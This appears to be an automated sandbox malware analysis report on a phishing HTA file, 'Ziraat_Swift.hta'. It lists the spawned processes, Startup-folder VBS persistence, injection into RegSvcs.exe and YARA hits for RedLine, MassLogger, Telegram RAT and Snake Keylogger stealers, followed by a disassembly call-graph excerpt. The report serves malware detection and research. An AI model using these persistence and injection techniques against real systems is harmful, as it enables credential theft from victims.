                                                                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:01:55:59
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:mshta.exe "C:\Users\user\Desktop\Ziraat_Swift.hta"
                                                                                                                                                Imagebase:0xf00000
                                                                                                                                                File size:13'312 bytes
                                                                                                                                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:1
                                                                                                                                                Start time:01:56:04
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'696'256 bytes
                                                                                                                                                MD5 hash:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:01:56:05
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'290'240 bytes
                                                                                                                                                MD5 hash:C8BF45BDD9AC7A2C04E7836B9AC9D15E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:01:56:06
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\alg.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:1'225'728 bytes
                                                                                                                                                MD5 hash:70BB2AC3B1D5DF22D2B74DA852AD13AA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:01:56:06
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'696'256 bytes
                                                                                                                                                MD5 hash:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.1762544925.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:01:56:07
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                                                Imagebase:0x4d0000
                                                                                                                                                File size:45'984 bytes
                                                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2946618374.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:01:56:08
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:2'354'176 bytes
                                                                                                                                                MD5 hash:325FCE66CB0133E663D042F034BDE5AF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:01:56:09
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:1'356'800 bytes
                                                                                                                                                MD5 hash:FED16854B8EA309A65BF6450ECACF0D0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:01:56:19
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\differences.vbs"
                                                                                                                                                Imagebase:0x7ff7dc3c0000
                                                                                                                                                File size:170'496 bytes
                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:01:56:20
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\subpredicate\differences.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'696'256 bytes
                                                                                                                                                MD5 hash:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.1905647858.0000000004080000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:01:56:22
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\subpredicate\differences.exe"
                                                                                                                                                Imagebase:0x300000
                                                                                                                                                File size:45'984 bytes
                                                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:01:56:22
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\subpredicate\differences.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'696'256 bytes
                                                                                                                                                MD5 hash:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.1924522530.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:01:56:23
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\subpredicate\differences.exe"
                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                File size:45'984 bytes
                                                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2945957784.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:17
                                                                                                                                                Start time:01:57:49
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                Commandline:
                                                                                                                                                Imagebase:
                                                                                                                                                File size:138'056 bytes
                                                                                                                                                MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                Has elevated privileges:
                                                                                                                                                Has administrator privileges:
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:18
                                                                                                                                                Start time:01:57:49
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                Commandline:
                                                                                                                                                Imagebase:
                                                                                                                                                File size:174'408 bytes
                                                                                                                                                MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                Has elevated privileges:
                                                                                                                                                Has administrator privileges:
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:19
                                                                                                                                                Start time:01:57:49
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                Commandline:
                                                                                                                                                Imagebase:
                                                                                                                                                File size:154'952 bytes
                                                                                                                                                MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                Has elevated privileges:
                                                                                                                                                Has administrator privileges:
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:20
                                                                                                                                                Start time:01:57:49
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:1'930'240 bytes
                                                                                                                                                MD5 hash:D57EFB62378CB9FE5ABA5C4735D90C00
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:01:57:51
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:1'242'624 bytes
                                                                                                                                                MD5 hash:B7AC35C8D5EC032758BDF18DAF940E76
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:01:57:53
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                Imagebase:0x7ff72bec0000
                                                                                                                                                File size:1'278'464 bytes
                                                                                                                                                MD5 hash:6B414CB462A630E3121C6075205CFF23
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:01:57:56
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:1'235'968 bytes
                                                                                                                                                MD5 hash:4E2ACC748CE94AC4AC70C66C0815F52C
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:01:57:57
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'150'976 bytes
                                                                                                                                                MD5 hash:44C283F4BD1BAB81C2FA725DEF4F6B81
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:27
                                                                                                                                                Start time:01:57:59
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\Locator.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:1'141'248 bytes
                                                                                                                                                MD5 hash:DCAC6C83695DE7AFC6FBC22B2463934D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:28
                                                                                                                                                Start time:01:58:02
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:1'846'784 bytes
                                                                                                                                                MD5 hash:723558C0A185F957C2EBE638F8BBB34E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:29
                                                                                                                                                Start time:01:58:03
                                                                                                                                                Start date:02/12/2024
                                                                                                                                                Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                File size:1'146'880 bytes
                                                                                                                                                MD5 hash:B2CFA94DAEAB765B33AE6E7BD777C6D9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:3.5%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:6.7%
                                                                                                                                                  Signature Coverage:7%
                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                  Total number of Limit Nodes:68
                                                                                                                                                  execution_graph 108384 a75085 108385 a7506f 108384->108385 108386 a75089 108384->108386 108389 a98550 108385->108389 108388 a75078 108410 a98556 108389->108410 108390 a98145 GetLastError 108408 a97dd7 108390->108408 108391 a98579 FreeSid 108391->108410 108392 a983fb GetUserNameW 108392->108408 108393 a98bc1 GetLastError 108393->108410 108394 a98209 GetUserNameW 108394->108408 108412 a97d37 108394->108412 108395 a98986 SetEntriesInAclW 108395->108410 108396 a9890b LocalFree 108396->108410 108397 a989cd OpenMutexW 108397->108388 108399 a9824a GetLastError 108399->108388 108399->108408 108400 a9836e GetLastError 108400->108408 108401 a97d6c GetVolumeInformationW 108401->108388 108402 a97d30 108402->108401 108402->108412 108403 a97d20 108403->108401 108403->108402 108405 a97d83 GetWindowsDirectoryW 108403->108405 108411 a97e06 GetComputerNameW 108403->108411 108403->108412 108404 a98599 108404->108402 108407 a9896a wsprintfW 108404->108407 108405->108402 108405->108412 108406 a97fd4 GetLastError 108406->108408 108407->108402 108408->108390 108408->108392 108408->108394 108408->108399 108408->108400 108408->108401 108408->108402 108408->108403 108408->108406 108408->108412 108413 a97f6b GetVolumeInformationW 108408->108413 108409 a98953 AllocateAndInitializeSid 108409->108410 108410->108389 108410->108390 108410->108391 108410->108393 108410->108395 108410->108396 108410->108397 108410->108402 108410->108403 108410->108404 108410->108407 108410->108408 108410->108409 108410->108412 108411->108412 108412->108388 108413->108408 108414 43fe27 108427 41f944 108414->108427 108416 43fe3d 108417 43fe53 108416->108417 108418 43febe 108416->108418 108516 409e5d 60 API calls 108417->108516 108436 40fce0 108418->108436 108420 43fe92 108422 44089c 108420->108422 108424 43fe9a 108420->108424 108518 469e4a 89 API calls 4 library calls 108422->108518 108517 46834f 59 API calls Mailbox 108424->108517 108426 43feb2 Mailbox 108428 41f950 108427->108428 108429 41f962 108427->108429 108519 409d3c 60 API calls Mailbox 108428->108519 108431 41f991 108429->108431 108432 41f968 108429->108432 108530 409d3c 60 API calls Mailbox 108431->108530 108520 420db6 108432->108520 108435 41f95a 108435->108416 108559 408180 108436->108559 108438 40fd3d 108439 44472d 108438->108439 108500 4106f6 108438->108500 108564 40f234 108438->108564 108682 469e4a 89 API calls 4 library calls 108439->108682 108443 44488d 108449 40fe4c 108443->108449 108494 444742 108443->108494 108688 47a2d9 85 API calls Mailbox 108443->108688 108444 40fe3e 108444->108443 108444->108449 108686 4566ec 59 API calls 2 library calls 108444->108686 108445 410517 108455 420db6 Mailbox 59 API calls 108445->108455 108446 444b53 108446->108494 108707 469e4a 89 API calls 4 library calls 108446->108707 108448 4447d7 108448->108494 108684 469e4a 89 API calls 4 library calls 108448->108684 108449->108446 108456 4448f9 108449->108456 108568 40837c 108449->108568 108450 444755 108450->108448 108683 40f6a3 331 API calls 108450->108683 108452 444848 108687 4560ef 59 API calls 2 library calls 108452->108687 108465 410545 _memmove 108455->108465 108466 444917 108456->108466 108690 4085c0 59 API calls Mailbox 108456->108690 108460 40fdd3 108460->108444 108460->108445 108460->108450 108460->108465 108470 420db6 59 API calls Mailbox 108460->108470 108487 44480c 108460->108487 108460->108494 108656 409ea0 108460->108656 108461 40fea4 108472 444ad6 108461->108472 108473 40ff32 108461->108473 108510 410179 Mailbox _memmove 108461->108510 108462 44486b 108469 409ea0 331 API calls 108462->108469 108463 4448b2 Mailbox 108463->108449 108689 4566ec 59 API calls 2 library calls 108463->108689 108474 420db6 Mailbox 59 API calls 108465->108474 108468 444928 108466->108468 108691 4085c0 59 API calls Mailbox 108466->108691 108468->108510 108692 4560ab 59 API calls Mailbox 108468->108692 108469->108443 108470->108460 108701 469ae7 60 API calls 108472->108701 108476 420db6 Mailbox 59 API calls 108473->108476 108514 410106 _memmove 108474->108514 108479 40ff39 108476->108479 108479->108500 108575 4109d0 108479->108575 108481 444a4d 108482 409ea0 331 API calls 108481->108482 108484 444a87 108482->108484 108484->108494 108696 4084c0 108484->108696 108485 40ffb2 108485->108465 108492 40ffe6 108485->108492 108485->108500 108685 469e4a 89 API calls 4 library calls 108487->108685 108502 410007 108492->108502 108702 408047 108492->108702 108493 444ab2 108700 469e4a 89 API calls 4 library calls 108493->108700 108495 420db6 59 API calls Mailbox 108495->108510 108681 469e4a 89 API calls 4 library calls 108500->108681 108501 410398 108501->108426 108502->108500 108503 444b24 108502->108503 108506 41004c 108502->108506 108706 409d3c 60 API calls Mailbox 108503->108706 108505 4100d8 108652 409d3c 60 API calls Mailbox 108505->108652 108506->108446 108506->108500 108506->108505 108508 444a1c 108511 420db6 Mailbox 59 API calls 108508->108511 108509 4100eb 108509->108500 108653 4082df 59 API calls Mailbox 108509->108653 108510->108481 108510->108493 108510->108495 108510->108500 108510->108501 108510->108508 108654 408740 68 API calls __cinit 108510->108654 108655 408660 68 API calls 108510->108655 108693 465937 68 API calls 108510->108693 108694 4089b3 69 API calls Mailbox 108510->108694 108695 409d3c 60 API calls Mailbox 108510->108695 108511->108481 108514->108510 108515 410162 108514->108515 108680 409c90 59 API calls Mailbox 108514->108680 108515->108426 108516->108420 108517->108426 108518->108426 108519->108435 108523 420dbe 108520->108523 108522 420dd8 108522->108435 108523->108522 108525 420ddc std::exception::exception 108523->108525 108531 42571c 108523->108531 108548 4233a1 DecodePointer 108523->108548 108549 42859b RaiseException 108525->108549 108527 420e06 108550 4284d1 58 API calls _free 108527->108550 108529 420e18 108529->108435 108530->108435 108532 425797 108531->108532 108544 425728 108531->108544 108557 4233a1 DecodePointer 108532->108557 108534 42579d 108558 428b28 58 API calls __getptd_noexit 108534->108558 108537 42575b RtlAllocateHeap 108538 42578f 108537->108538 108537->108544 108538->108523 108540 425783 108555 428b28 58 API calls __getptd_noexit 108540->108555 108544->108537 108544->108540 108545 425781 108544->108545 108546 425733 108544->108546 108554 4233a1 DecodePointer 108544->108554 108556 428b28 58 API calls __getptd_noexit 108545->108556 108546->108544 108551 42a16b 58 API calls 2 library calls 108546->108551 108552 42a1c8 58 API calls 8 library calls 108546->108552 108553 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108546->108553 108548->108523 108549->108527 108550->108529 108551->108546 108552->108546 108554->108544 108555->108545 108556->108538 108557->108534 108558->108538 108560 40818f 108559->108560 108563 4081aa 108559->108563 108708 407e4f 108560->108708 108562 408197 CharUpperBuffW 108562->108563 108563->108438 108565 40f251 108564->108565 108566 40f272 108565->108566 108712 469e4a 89 API calls 4 library calls 108565->108712 108566->108460 108569 40838d 108568->108569 108570 43edbd 108568->108570 108571 420db6 Mailbox 59 API calls 108569->108571 108572 408394 108571->108572 108573 4083b5 108572->108573 108713 408634 59 API calls Mailbox 108572->108713 108573->108456 108573->108461 108576 444cc3 108575->108576 108588 4109f5 108575->108588 108775 469e4a 89 API calls 4 library calls 108576->108775 108578 410cfa 108578->108485 108580 410ee4 108580->108578 108582 410ef1 108580->108582 108773 411093 331 API calls Mailbox 108582->108773 108583 410a4b PeekMessageW 108651 410a05 Mailbox 108583->108651 108586 410ef8 LockWindowUpdate DestroyWindow GetMessageW 